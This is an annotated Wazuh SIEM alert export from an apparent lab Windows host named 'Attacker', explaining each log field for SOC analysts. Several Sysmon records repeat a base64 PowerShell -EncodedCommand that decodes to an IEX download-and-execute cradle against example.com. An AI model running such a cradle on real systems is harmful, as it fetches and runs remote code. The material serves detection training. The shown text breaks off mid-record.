Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:24.1476257Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283761
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:24.093 ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} ProcessId: 11516 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1 CreationUtcTime: 2025-04-24 22:37:24.093 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:24.093
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd21-680a-440b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:24.093
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:30.296+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:30.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  52
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534250.1409480
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:28.2950627Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283820
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:26.762 ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ProcessId: 2020 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} ParentProcessId: 11516 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:26.762
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd26-680a-460b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd21-680a-440b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:30.318+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:30.318+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  56
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534250.1417547
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:28.5074564Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283821
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:28.496 ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ProcessId: 2020 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1 CreationUtcTime: 2025-04-24 22:37:28.496 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:28.496
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd26-680a-460b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:28.496
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:37:33.196+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:33.196+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.5.6']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534253.1420312
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26156
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Special Logon' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.5.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Special Logon"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Special Logon"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:34.157+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:34.157+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  53
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534254.1423149
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:31.5031620Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283846
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:30.168 ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} ProcessId: 10656 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ParentProcessId: 2020 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:30.168
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd2a-680a-490b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10656
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
